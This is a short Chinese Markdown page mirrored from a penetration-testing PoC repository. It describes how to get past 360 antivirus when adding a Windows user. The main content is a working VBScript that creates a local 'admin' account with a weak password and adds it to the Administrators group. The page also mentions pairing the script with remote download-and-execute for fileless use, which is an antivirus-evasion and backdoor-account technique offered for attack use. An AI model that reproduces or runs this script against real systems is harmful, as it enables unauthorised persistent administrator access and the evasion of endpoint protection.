mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-07-09 16:05:40 +00:00
30 lines
716 B
Markdown
30 lines
716 B
Markdown
|
正常执行命令添加用户会被360拦截如图:
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
使用vbs添加用户绕过360,成功添加:
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
项目`tools`目录也有添加add_user.vbs脚本,可以配合远程下载执行无文件落地执行。
|
|||
|
|
|
|||
|
|
源码如下:
|
|||
|
|
|
|||
|
|
```vbscript
|
|||
|
|
|
|||
|
|
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
|
|||
|
|
os="WinNT://"&wsnetwork.ComputerName
|
|||
|
|
Set ob=GetObject(os)
|
|||
|
|
Set oe=GetObject(os&"/Administrators,group")
|
|||
|
|
Set od=ob.Create("user","admin")
|
|||
|
|
od.SetPassword "123456"
|
|||
|
|
od.SetInfo
|
|||
|
|
Set of=GetObject(os&"/admin",user)
|
|||
|
|
oe.add os&"/admin"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
注意密码复杂性,我项目里面的脚本密码是`Love@123456`
|
|||
|
|
|
|||
|
|
⚠️请合理使用,资源来自:https://mp.weixin.qq.com/s/yWTA8Q2GPwOMQBHph5srJQ
|
|||
|
|
|